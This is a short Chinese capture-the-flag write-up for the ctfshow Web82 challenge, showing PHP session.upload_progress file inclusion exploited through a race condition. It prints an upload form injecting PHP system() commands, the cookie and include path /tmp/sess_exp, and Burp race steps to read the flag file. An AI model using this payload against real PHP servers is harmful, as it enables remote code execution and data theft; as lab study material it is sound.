文件包涵条件竞争(ctfshow82)

小春学渗透2024-07-30 23:28

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
仙女很美哦1 小时前
flutter性能优化总结
websocket·网络协议·tcp/ip·http·网络安全·https·udp
风澜舞2 小时前
windows防火墙高级设置
网络安全
色的归属感3 小时前
android adb 查看设备传感器
websocket·网络协议·tcp/ip·http·网络安全·https·udp
鹅肝手握高V五色4 小时前
安卓应用开发学习:查看手机传感器信息
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Bug.ink4 小时前
RCE——回调后门
网络安全·rce
iOS技术狂热者13 小时前
多图超详细安装flutter&Android Studio开发环境,并配置插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
盛满暮色 风止何安16 小时前
VLAN的高级特性
运维·服务器·开发语言·网络·网络协议·网络安全·php
故事与他64518 小时前
电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
java·开发语言·前端·javascript·安全·网络安全
热门推荐
01我决定放弃搞 Java 了02DeepSeek各版本说明与优缺点分析03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【笔记】MJ Prompt05RAG 实践- Ollama+RagFlow 部署本地知识库06如何在WPS和Word/Excel中直接使用DeepSeek功能07uniApp使用XR-Frame创建3D场景(3)光源投影的运用。08苍穹外卖面试总结09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10【通信中间件】Fdbus HelloWorld实例